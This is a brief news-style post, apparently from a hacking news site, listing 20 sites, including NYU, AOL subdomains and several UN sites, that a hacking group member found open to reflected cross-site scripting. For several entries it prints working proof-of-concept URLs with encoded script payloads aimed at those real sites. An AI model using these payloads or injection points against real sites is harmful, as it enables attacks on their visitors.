XSS vulnerability found in 20 High profile sites by GOH group



An Indian ethical hacker named Akshay, AKA 0z0n3, belonging to the hacking crew called GOH (godofhackers), has found 20 high-profile sites vulnerable to non-persistent XSS attacks.


The list of vulnerable sites with their screenshots:

1. nyu.edu - vuln link - http://www.nyu.edu/search.html?search=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/33v2hkz.png

2. barclays.co.uk - snap - http://i46.tinypic.com/wrhlp4.png - status - patched

3. pakistanstockexchange.com - vuln link - http://pakstockexchange.com/stock2/index_new.php?section=research&page=company_chooser_new&keyword=\%27;alert%28String.fromCharCode%2888,83,83%29%29//\\\%27;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//\\\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E\%22%3E\%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E - snap - http://i49.tinypic.com/16huvi9.png

4. lilwaynehq.com - official site of Lil Wayne - vuln link - http://www.lilwaynehq.com/?s=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%20by%200z0n3%20of%20.::[GOH]::.%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i50.tinypic.com/zugubs.png

5. mercury-pc.com - vuln link - http://www.mercury-pc.com/search.php - snap - http://i48.tinypic.com/b624qa.png

6. transcend.com - vuln link - http://www.transcend-info.com/Support/Search/index.asp - snap - http://i47.tinypic.com/28letjc.png

7. bangladeshtradeinfo.com - vuln link - http://www.bdtradeinfo.com//yellowpages/search.asp?search=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E - snap - http://i49.tinypic.com/dzc68.png

8. defense.aol.com - vuln link - http://defense.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/6fpgeq.png

9. gov.aol.com - vuln link - http://gov.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i47.tinypic.com/f0n59x.png

10. http://www.unicc.org/ - http://i39.tinypic.com/352iycw.png

11. http://www.un.org.au - http://i44.tinypic.com/critx.jpg

12. http://unfccc.int - http://i40.tinypic.com/e0qrdf.png

13. http://search2.unaids.org - http://i43.tinypic.com/4gruww.png

14. http://unu.edu - http://i39.tinypic.com/v8odw9.png

15. http://www.unpri.org - http://i41.tinypic.com/20pegsj.png

16. http://www.uneval.org - http://i50.tinypic.com/2w3t2lz.png

17. http://www.unscn.org - http://i49.tinypic.com/11ugo76.jpg

18. http://www.undg.org - http://i45.tinypic.com/2zp2s6v.png

19. http://www.alienwarearena.com/ - http://i47.tinypic.com/vzbwif.png

20. www.games.com - AOL subdomain - http://i47.tinypic.com/33z9v8m.png